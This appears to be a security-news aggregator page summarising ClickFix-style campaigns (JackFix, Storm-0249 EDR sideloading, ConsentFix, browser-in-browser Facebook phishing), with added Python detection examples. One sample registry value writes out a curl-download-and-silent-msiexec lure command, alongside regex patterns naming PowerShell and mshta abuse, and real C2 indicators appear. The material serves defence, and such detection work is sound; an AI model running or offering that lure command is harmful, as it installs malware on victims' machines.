- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The JackFix campaign displays highly convincing fake Windows update screens in an attempt to get the victim to run malicious code.
  First reported: 25.11.2025 16:18 · 2 sources, 4 articles
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The attack heavily leans on obfuscation to conceal ClickFix-related code and blocks users from escaping the full-screen alert by disabling the Escape and F11 keys, along with F5 and F12.
  First reported: 25.11.2025 16:18 · 2 sources, 4 articles
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The initial command executed is an MSHTA payload that's launched using the legitimate mshta.exe binary, which contains JavaScript designed to run a PowerShell command to retrieve another PowerShell script from a remote server.
  First reported: 25.11.2025 16:18 · 2 sources, 4 articles
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The PowerShell script attempts to elevate privileges and creates Microsoft Defender Antivirus exclusions for command-and-control (C2) addresses and paths where the payloads are staged.
  First reported: 25.11.2025 16:18 · 2 sources, 4 articles
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The PowerShell script serves up to eight different payloads, including Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, and other unspecified loaders and RATs.
  First reported: 25.11.2025 16:18 · 2 sources, 4 articles
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The threat actor often changes the URI used to host the first mshta.exe stage and has been observed moving from hosting the second stage on the domain securitysettings.live to xoiiasdpsdoasdpojas.com, although both point to the same IP address 141.98.80.175.
  First reported: 25.11.2025 16:18 · 2 sources, 4 articles
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- Storm-0249 abuses endpoint detection and response (EDR) solutions and trusted Microsoft Windows utilities to load malware and to establish communication and persistence in preparation for ransomware attacks.
  First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Storm-0249 has moved beyond mass phishing and adopted stealthier, more advanced methods that prove effective and difficult for defenders to counter.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Storm-0249 leveraged the SentinelOne EDR components to hide malicious activity, but the same method works with other EDR products.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The attack started with ClickFix social engineering that tricked users into pasting and executing curl commands in the Windows Run dialog to download a malicious MSI package with SYSTEM privileges.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
A malicious PowerShell script is fetched from a spoofed Microsoft domain and piped straight into memory, never touching the disk and thus evading antivirus detection.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The MSI file drops a malicious DLL (SentinelAgentCore.dll) alongside the pre-existing, legitimate SentinelAgentWorker.exe that is already installed as part of the victim's SentinelOne EDR.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The attacker loads the DLL using the signed SentinelAgentWorker (DLL sideloading), executing the file within the trusted, privileged EDR process and obtaining stealthy persistence that survives operating system updates.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The legitimate process runs the attacker's code, appearing as routine SentinelOne activity to security tools and bypassing detection.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Once the attacker gains access, they use the SentinelOne component to collect system identifiers through legitimate Windows utilities like reg.exe and findstr.exe, and to funnel encrypted HTTPS command-and-control (C2) traffic.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Registry queries and string searches conducted from within a trusted EDR process are treated as routine and ignored by security mechanisms.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The compromised systems are profiled using 'MachineGuid,' a unique hardware-based identifier that ransomware groups like LockBit and ALPHV use for binding encryption keys to specific victims.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The abuse of trusted, signed EDR processes bypasses nearly all traditional monitoring.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
System administrators are recommended to rely on behavior-based detection that identifies trusted processes loading unsigned DLLs from non-standard paths.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
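The behaviour-based check recommended above, written out as an added example (not code from the reporting or from any EDR vendor): it runs over a few constructed Sysmon-style image-load records (Event ID 7 field names; the values, the allowlist of "trusted" install roots and the user-writable path markers are this example's assumptions) and flags a signed, trusted process loading an unsigned DLL, plus DLLs loaded from user-writable or otherwise non-standard locations.

```python
import ntpath

# Constructed Sysmon-style image-load (Event ID 7) records. The field names follow
# Sysmon (Image, ImageLoaded, Signed, SignatureStatus); the values are made up.
SAMPLE_EVENTS = [
    {   # the pattern described above: an unsigned DLL loaded by the EDR worker
        "Image": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
        "ImageLoaded": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentCore.dll",
        "Signed": "false", "SignatureStatus": "Unavailable",
    },
    {   # benign: the same worker loading a validly signed system DLL
        "Image": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
        "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
        "Signed": "true", "SignatureStatus": "Valid",
    },
    {   # unsigned DLL pulled from a user-writable location
        "Image": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
        "ImageLoaded": r"C:\ProgramData\cache\helper.dll",
        "Signed": "false", "SignatureStatus": "Unavailable",
    },
    {   # benign: an ordinary process loading from System32
        "Image": r"C:\Windows\System32\notepad.exe",
        "ImageLoaded": r"C:\Windows\System32\user32.dll",
        "Signed": "true", "SignatureStatus": "Valid",
    },
]

# Hypothetical allowlist of install roots whose processes are treated as "trusted";
# in a real deployment this comes from the security products present in the estate.
TRUSTED_PROCESS_ROOTS = ("c:\\program files\\sentinelone\\",)
# Directories from which DLL loads are expected for any process.
STANDARD_DLL_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows\\winsxs")
# Path fragments that indicate a user-writable location (assumed list).
USER_WRITABLE_MARKERS = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")


def _dir(path):
    """Lower-cased parent directory of a Windows path, with a trailing backslash."""
    return ntpath.dirname(path).lower() + "\\"


def classify_image_load(event):
    """Return the list of detection reasons for one image-load event (empty if benign)."""
    proc_dir = _dir(event["Image"])
    dll_dir = _dir(event["ImageLoaded"])
    trusted_process = proc_dir.startswith(TRUSTED_PROCESS_ROOTS)
    validly_signed = (event.get("Signed", "").lower() == "true"
                      and event.get("SignatureStatus") == "Valid")
    reasons = []
    # Core rule from the recommendation: a trusted process loading an unsigned DLL.
    if trusted_process and not validly_signed:
        reasons.append("unsigned-dll-in-trusted-process")
    # Supporting rules: where the DLL was loaded from.
    if any(marker in dll_dir for marker in USER_WRITABLE_MARKERS):
        reasons.append("dll-from-user-writable-path")
    if not dll_dir.startswith(STANDARD_DLL_DIRS) and dll_dir != proc_dir:
        reasons.append("dll-outside-standard-and-own-path")
    return reasons


def flag_sideloads(events):
    """Return (event, reasons) pairs for every event that trips at least one rule."""
    flagged = []
    for event in events:
        reasons = classify_image_load(event)
        if reasons:
            flagged.append((event, reasons))
    return flagged


if __name__ == "__main__":
    for event, reasons in flag_sideloads(SAMPLE_EVENTS):
        print(ntpath.basename(event["Image"]), "->", event["ImageLoaded"], reasons)
```

Note that the SentinelAgentCore.dll case trips only the first rule: the DLL sits in the product's own directory, so a path-based rule alone would miss it, which is why the signature check on the loaded image is the one that matters here.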
It is helpful to set stricter controls for curl, PowerShell, and LoLBin execution.
First reported: 09.12.2025 17:24 · 2 sources, 3 articles
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
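One place to look for the Run-dialog step of this ClickFix chain is Explorer's RunMRU key, which records commands typed into Win+R. The following added example (not code from the reporting) scans a constructed RunMRU snapshot for the command shapes described above: curl fetching over HTTP, msiexec installs, PowerShell with hidden/encoded/remote-execution switches, mshta with a URL, and the CAPTCHA-style comment appended to the lure. The sample values, the `.invalid` domain and the regex set are this example's own assumptions, not a vendor rule set.

```python
import re
from dataclasses import dataclass, field

# Constructed snapshot of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Explorer stores each Run-dialog command as a one-letter value suffixed with "\1",
# and MRUList orders those letters from most to least recent.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": r"notepad\1",
    "b": r"cmd /c curl -o %TEMP%\upd.msi http://update.example.invalid/u && msiexec /i %TEMP%\upd.msi /qn # I am not a robot - Verification ID: 4821\1",
    "c": r"ms-settings:\1",
}

# Heuristics for the command shapes described in the reporting above (assumed patterns).
RULES = {
    "remote-download-curl": re.compile(r"\bcurl(\.exe)?\b.*https?://", re.I),
    "msi-install": re.compile(r"\bmsiexec(\.exe)?\b.*(/i|/package)\b", re.I),
    "powershell-hidden-or-remote": re.compile(
        r"\bpowershell(\.exe)?\b.*(-e(nc|ncodedcommand)?\b|iex\b|invoke-expression|"
        r"downloadstring|-w(indowstyle)?\s+hidden|-nop\b|bypass)", re.I),
    "mshta-remote": re.compile(r"\bmshta(\.exe)?\b\s+\S*https?://", re.I),
    "captcha-lure-comment": re.compile(r"#.*(not a robot|verification|captcha)", re.I),
}


@dataclass
class RunEntry:
    slot: str            # the one-letter value name in RunMRU
    command: str         # the command with the trailing "\1" removed
    reasons: list = field(default_factory=list)


def parse_runmru(values):
    """Return RunEntry objects ordered most-recent-first, with the "\\1" suffix stripped."""
    entries = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        command = raw[:-2] if raw.endswith("\\1") else raw
        entries.append(RunEntry(slot=slot, command=command))
    return entries


def scan_runmru(values):
    """Return only the entries that trip at least one ClickFix heuristic."""
    hits = []
    for entry in parse_runmru(values):
        entry.reasons = [name for name, rx in RULES.items() if rx.search(entry.command)]
        if entry.reasons:
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in scan_runmru(SAMPLE_RUNMRU):
        print(hit.slot, hit.reasons, hit.command[:60])
```

In a real hunt the dictionary would come from a registry export or an EDR registry telemetry stream rather than a literal; the parsing and rule logic stay the same. Pair the RunMRU check with process-creation telemetry, since the key is only written when the command is actually submitted from the Run dialog.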
ConsentFix is a new variant of the ClickFix attack that abuses the Azure CLI OAuth app to hijack Microsoft accounts without needing the victim's password or having to bypass MFA verification.
First reported: 11.12.2025 17:10 · 2 sources, 3 articles
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
ConsentFix tricks victims into completing the Azure CLI OAuth flow and steals the resulting authorization code, which is exchanged for full account access.
First reported: 11.12.2025 17:10 · 2 sources, 3 articles
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The attack starts with victims landing on a compromised, legitimate website that ranks high on Google Search results.
First reported: 11.12.2025 17:10 · 2 sources, 3 articles
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Victims are shown a fake Cloudflare Turnstile CAPTCHA widget that asks for a valid business email address, filtering out bots and non-targets.
First reported: 11.12.2025 17:10 · 2 sources, 3 articles
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Victims are instructed to click a 'Sign in' button that opens a legitimate Microsoft URL in a new tab, leading to an Azure login page.
First reported: 11.12.2025 17:10 · 2 sources, 3 articles
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The attack completes when victims paste the URL containing the Azure CLI OAuth authorization code into the malicious page, granting attackers access to the Microsoft account via Azure CLI.
First reported: 11.12.2025 17:10 · 2 sources, 3 articles
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The attack triggers only once per victim IP address, preventing repeated phishing attempts on the same IP.
First reported: 11.12.2025 17:10 · 2 sources, 3 articles
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Defenders are advised to monitor for unusual Azure CLI login activity, such as logins from new IP addresses, and to check for legacy Graph scopes used by attackers to evade detection.
First reported: 11.12.2025 17:10 · 2 sources, 3 articles
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
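The monitoring advice above, as an added example that is not part of the reporting: it builds a per-user baseline of IP addresses seen with the Azure CLI application during a baseline window, then flags later successful Azure CLI sign-ins from an IP the user has never used with the CLI, and sign-ins whose resource is the legacy Azure AD Graph ("Windows Azure Active Directory") rather than Microsoft Graph. The records are constructed; the field names follow the Entra sign-in log schema, and the cutoff date, user names, IPs and placeholder portal app id are this example's assumptions.

```python
from collections import defaultdict
from datetime import datetime

# Well-known first-party application id of the Azure CLI as it appears in Entra sign-in logs.
AZURE_CLI_APP_ID = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"
# Resource display name of the legacy Azure AD Graph API; current tooling targets "Microsoft Graph".
LEGACY_GRAPH_RESOURCE = "Windows Azure Active Directory"

# Constructed Entra sign-in records (field names follow the Graph signIn resource; values are made up).
SAMPLE_SIGNINS = [
    {"createdDateTime": "2025-12-01T09:00:00Z", "userPrincipalName": "alice@contoso.example",
     "appId": AZURE_CLI_APP_ID, "appDisplayName": "Microsoft Azure CLI", "ipAddress": "203.0.113.10",
     "resourceDisplayName": "Microsoft Graph", "status": {"errorCode": 0}},
    {"createdDateTime": "2025-12-03T10:15:00Z", "userPrincipalName": "alice@contoso.example",
     "appId": AZURE_CLI_APP_ID, "appDisplayName": "Microsoft Azure CLI", "ipAddress": "203.0.113.10",
     "resourceDisplayName": "Microsoft Graph", "status": {"errorCode": 0}},
    # the ConsentFix-shaped event: CLI sign-in from a never-seen IP against the legacy Graph resource
    {"createdDateTime": "2025-12-11T14:02:00Z", "userPrincipalName": "alice@contoso.example",
     "appId": AZURE_CLI_APP_ID, "appDisplayName": "Microsoft Azure CLI", "ipAddress": "198.51.100.77",
     "resourceDisplayName": LEGACY_GRAPH_RESOURCE, "status": {"errorCode": 0}},
    # unrelated app (placeholder app id), ignored by the CLI-focused rule
    {"createdDateTime": "2025-12-11T14:05:00Z", "userPrincipalName": "bob@contoso.example",
     "appId": "00000000-0000-0000-0000-000000000001", "appDisplayName": "Some Portal App",
     "ipAddress": "203.0.113.20", "resourceDisplayName": "Microsoft Graph", "status": {"errorCode": 0}},
    # routine CLI use from a known IP
    {"createdDateTime": "2025-12-12T08:30:00Z", "userPrincipalName": "alice@contoso.example",
     "appId": AZURE_CLI_APP_ID, "appDisplayName": "Microsoft Azure CLI", "ipAddress": "203.0.113.10",
     "resourceDisplayName": "Microsoft Graph", "status": {"errorCode": 0}},
    # failed CLI sign-in (non-zero error code), excluded: no session was issued
    {"createdDateTime": "2025-12-12T09:00:00Z", "userPrincipalName": "alice@contoso.example",
     "appId": AZURE_CLI_APP_ID, "appDisplayName": "Microsoft Azure CLI", "ipAddress": "198.51.100.78",
     "resourceDisplayName": "Microsoft Graph", "status": {"errorCode": 50126}},
]


def _ts(value):
    """Parse an ISO-8601 timestamp with a trailing Z."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def azure_cli_anomalies(signins, baseline_end):
    """Flag successful Azure CLI sign-ins at or after baseline_end that come from an IP the
    user has not used with the CLI before, or that target the legacy Azure AD Graph resource."""
    cutoff = _ts(baseline_end)
    known_ips = defaultdict(set)
    cli_events = sorted(
        (e for e in signins
         if e.get("appId") == AZURE_CLI_APP_ID and e.get("status", {}).get("errorCode", 0) == 0),
        key=lambda e: _ts(e["createdDateTime"]))
    findings = []
    for event in cli_events:
        upn, ip = event["userPrincipalName"], event["ipAddress"]
        if _ts(event["createdDateTime"]) < cutoff:
            known_ips[upn].add(ip)          # baseline window: learn, do not alert
            continue
        reasons = []
        if ip not in known_ips[upn]:
            reasons.append("azure-cli-from-new-ip")
        if event.get("resourceDisplayName") == LEGACY_GRAPH_RESOURCE:
            reasons.append("legacy-aad-graph-resource")
        if reasons:
            findings.append({"time": event["createdDateTime"], "user": upn,
                             "ipAddress": ip, "reasons": reasons})
        known_ips[upn].add(ip)              # one alert per new IP, then it joins the baseline
    return findings


if __name__ == "__main__":
    for finding in azure_cli_anomalies(SAMPLE_SIGNINS, "2025-12-10T00:00:00Z"):
        print(finding)
```

The baseline is deliberately keyed per user and per application: an IP that is normal for the Azure Portal in a browser is still new for the Azure CLI, which is the distinction the ConsentFix flow exploits.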
The BitB phishing technique was developed by security researcher mr.d0x in 2022.
First reported: 12.01.2026 23:05 · 3 sources, 3 articles
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Threat actors steal Facebook accounts to spread scams, harvest personal data, or commit identity fraud.
First reported: 12.01.2026 23:05 · 3 sources, 3 articles
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
In a BitB attack, users who visit attacker-controlled webpages are presented with a fake browser pop-up containing a login form.
First reported: 12.01.2026 23:05 · 3 sources, 3 articles
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
The pop-up is implemented using an iframe that imitates the authentication interface of legitimate platforms and can be customized with a window title and URL that make the deception more difficult to detect.
First reported: 12.01.2026 23:05 · 3 sources, 3 articles
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Recent phishing campaigns targeting Facebook users impersonate law firms claiming copyright infringement, threatening imminent account suspension, or Meta security notifications about unauthorized logins.
First reported: 12.01.2026 23:05 · 3 sources, 3 articles
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
To avoid detection and to increase the sense of legitimacy, cybercriminals added shortened URLs and fake Meta CAPTCHA pages.
First reported: 12.01.2026 23:05 · 3 sources, 3 articles
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
In the final stage of the attack, victims are prompted to log in by entering their Facebook credentials in a fake pop-up window.
First reported: 12.01.2026 23:05 · 3 sources, 3 articles
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
Trellix discovered a high number of phishing pages hosted on legitimate cloud platforms like Netlify and Vercel, which mimic Meta's Privacy Center portal, redirecting users to pages disguised as appeal forms that collected personal information.
First reported: 12.01.2026 23:05 · 3 sources, 3 articles
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
These campaigns constitute a significant evolution compared to standard Facebook phishing campaigns that security researchers typically observe.
First reported: 12.01.2026 23:05 · 3 sources, 3 articles
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
-
